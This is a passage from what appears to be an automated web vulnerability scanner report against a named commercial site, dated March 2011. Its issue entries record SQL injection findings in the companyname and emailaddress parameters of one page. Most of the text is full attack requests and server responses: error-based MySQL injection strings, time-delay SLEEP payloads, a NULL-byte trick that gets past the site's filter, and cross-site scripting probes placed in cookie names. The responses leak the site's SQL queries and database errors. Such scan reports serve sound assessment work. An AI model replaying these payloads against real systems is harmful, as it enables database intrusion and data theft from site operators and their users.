Cookie: JSESSIONID=A6240CD3E62E72A7A802AF6565414F2D; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:35:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=c269e8d0lq8jm9ea5me37k8qq2; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project.php was not found on this server.</p>

1.53. http://www.insideup.com/ppc/leadflow/bulo00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the companyname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:24:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5

1.54. http://www.insideup.com/ppc/leadflow/bulo00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:53 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.55. http://www.insideup.com/ppc/leadflow/bulo00/project.php [companyname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name%00'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8350


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ercard&attributeId_529=3407__ $0 - $5,000&button3=Submit&companyname=Company Name.'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname=Company+Name%00''&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=udli5ng4ft1qutifrim44ub5t1; JSESSIONID=3938ED843130D7AF1696C93CADE0B10E; OAID=029085b33b46dc8b68c77befe6006461
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:01:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.56. http://www.insideup.com/ppc/leadflow/bulo00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:44:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.57. http://www.insideup.com/ppc/leadflow/bulo00/project.php [emailaddress parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emailaddress parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

